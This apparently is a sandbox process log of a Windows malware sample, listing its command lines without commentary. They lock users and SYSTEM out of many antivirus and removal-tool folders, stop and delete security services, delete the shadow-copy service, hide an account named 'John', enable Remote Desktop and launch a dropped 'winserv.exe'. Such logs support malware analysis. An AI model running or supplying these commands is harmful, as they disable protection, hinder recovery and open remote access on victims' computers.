C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)

C:\Windows\system32\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\system32\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\system32\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\FRST /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\system32\timeout.exe

timeout 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Wise" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Wise" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ReasonLabs" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ReasonLabs" /deny "Admin":(OI)(CI)(F)

C:\Windows\SysWOW64\unsecapp.exe

"C:\Windows\SysWOW64\unsecapp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F

C:\Windows\system32\icacls.exe

icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\system32\sc.exe

sc delete swprv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\system32\sc.exe

sc stop mbamservice

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\system32\sc.exe

sc stop bytefenceservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\system32\sc.exe

sc delete bytefenceservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\system32\sc.exe

sc delete mbamservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\system32\sc.exe

sc delete crmsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat

C:\Windows\system32\timeout.exe

timeout 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4972,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

